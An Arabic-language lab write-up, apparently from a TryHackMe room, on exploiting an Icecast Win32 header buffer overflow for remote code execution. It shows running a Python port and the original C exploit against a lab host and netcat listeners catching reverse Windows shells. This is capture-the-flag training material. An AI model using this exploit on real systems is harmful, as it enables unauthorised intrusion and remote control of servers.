
Icecast ثغرة تجاوز سعة المخزن المؤقت وكتابة رأس (Header Overwrite) تؤدي إلى تنفيذ كود عن بُعد (RCE) للإصدارات < 2.0.1 (Win32)
إصدار Python 3 من تجاوز سعة المخزن المؤقت لرأس Icecast المؤدي إلى تنفيذ تعليمات برمجية عن بُعد < 2.0.1 (Win32)، معاد كتابته من وحدة Metasploit. أعدت كتابته من وحدة Metasploit لأنني لم أستطع تشغيل هذا.
استبدل شيلكود الصدفة العكسية في الاستغلال، واستدعه مع وسيط للخادم البعيد والمنفذ.
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000
Done!
مستمع الصدفة العكسية:
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
تمكنت من تشغيل الاستغلال الأصلي. تم التعديل وفقًا لهذا.
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
على المستمع
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>